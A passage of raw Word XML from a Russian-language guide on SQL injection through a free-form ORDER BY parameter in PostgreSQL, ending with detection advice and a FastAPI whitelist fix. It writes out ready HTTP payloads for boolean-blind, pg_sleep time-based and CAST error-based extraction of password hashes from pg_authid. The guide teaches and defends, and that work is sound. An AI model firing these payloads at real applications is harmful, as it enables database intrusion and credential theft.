          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Порядок ID-rows в response будет разным</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в этих двух случаях, и атакующий сравнивает первые 5–10 ID с known-good response — boolean confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий итерирует: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">='a'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='m'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (true), сохраняет, переходит к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">substring(rolpassword,2,1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bitwise extraction password-а</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартная техника 3.3 (boolean-blind), просто канал — order вместо count rows. Требует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SELECT — обычно только superuser, но password-hashing reverse-engineering начинается с этого канала.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант B — time-based через pg_sleep в ORDER BY:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /reports/orders?sort_expr=(CASE%20WHEN%20(SELECT%20rolsuper%20FROM%20pg_roles%20WHERE%20rolname=current_user)%20THEN%20pg_sleep(5)::text%20ELSE%20''%20END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_expr = "(CASE WHEN ... THEN pg_sleep(5)::text ELSE '' END)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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ORDER BY (CASE WHEN (SELECT rolsuper FROM pg_roles WHERE rolname=current_user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              THEN pg_sleep(5)::text ELSE '' END)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep(5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">для каждой row, попадающей в sort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если orders содержит N rows, total delay = 5*N секунд. Атакующий выбирает endpoint с малым кол-вом rows (или добавляет LIMIT 1 через subquery в WHERE), чтобы time-delta была наблюдаемой (5–10 секунд для confirmation, без timeout от reverse-proxy).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант C — error-based через type-coercion в ORDER BY:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /reports/orders?sort_expr=(SELECT%20CAST(rolpassword%20AS%20int)%20FROM%20pg_authid%20WHERE%20rolname='postgres')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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ORDER BY (SELECT CAST(rolpassword AS int) FROM pg_authid WHERE rolname='postgres')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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 это MD5/SCRAM hash, конвертация в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падает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: invalid input syntax for type integer: "SCRAM-SHA-256$4096:..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP-500 с полным password-hash в error message. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2-канал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (error-based via CAST), использующий ORDER BY как точку входа. Эффективнее чем boolean-blind: один запрос даёт полный hash вместо побитного extraction.</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Variant A — boolean-blind extraction любого данного, доступного для SELECT (rolpassword только для superuser; обычные таблицы для application-роли). Variant B — confirmation injection через time-channel (видимая в логах). Variant C — error-based instant extraction. ORDER BY-канал особенно опасен тем, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP-200 с rows возвращается всегда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — приложение «отвечает корректно», только порядок rows другой. Без log-инспекции на client-side это незаметно.</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запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY (CASE WHEN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(SELECT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 pg_sleep ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нетипичные expression в ORDER BY от endpoint, где должен быть простой sort.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log_min_duration_statement = 1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: запросы с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY ... pg_sleep(N)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — длительность будет существенно выше нормы, легко обнаружить.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HTTP access-log: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sort_expr=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sort=</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WHEN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CAST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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PostgreSQL принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">полный expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который вычисляется для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">каждой row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> перед sorting. Документация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*"Each sort_expression can be the name or ordinal number of an output column, or it can be an arbitrary expression formed from input-column values."*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Семантика «expression per row» означает:</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Subquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в expression выполняется один раз (если non-correlated) или для каждой row (если correlated с outer query). Boolean conditions через CASE работают как row-level boolean.</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Side-effects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> разрешены (pg_sleep, COPY TO PROGRAM в подзапросе), несмотря на то что ORDER BY концептуально pure. PostgreSQL не enforces purity — это намеренно (extension functions могут иметь side-effects).</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Type errors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в expression падают как regular errors (SQLSTATE 22P02) — текст ошибки содержит исходное значение, попавшее в CAST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание этих фактов даёт три независимых канала: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Boolean-channel</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ORDER BY (CASE WHEN cond THEN colA ELSE colB END)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — sorting по разным колонкам меняет order rows.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Time-channel</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expression — total delay = N*rows × delay.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Error-channel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через type-coercion subquery — error message содержит leaked value.</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не bug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostgreSQL — это standard SQL expression semantics. Защита — application-level: ORDER BY-spec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не должна приходить от пользователя в free-form</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Корректный pattern — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">decompose sort-spec на column+direction tokens, validate каждый, build expression server-side</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from enum import Enum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from typing import List</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select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class OrderColumn(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    created_at = "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    amount = "amount"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status = "status"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@router.get("/reports/orders")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_orders(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort: List[str] = Query(["created_at:desc"]),  # формат "col:dir"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columns = []</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    for spec in sort:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if ":" not in spec:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        col_name, direction = spec.split(":", 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            col_enum = OrderColumn(col_name)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        except ValueError:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
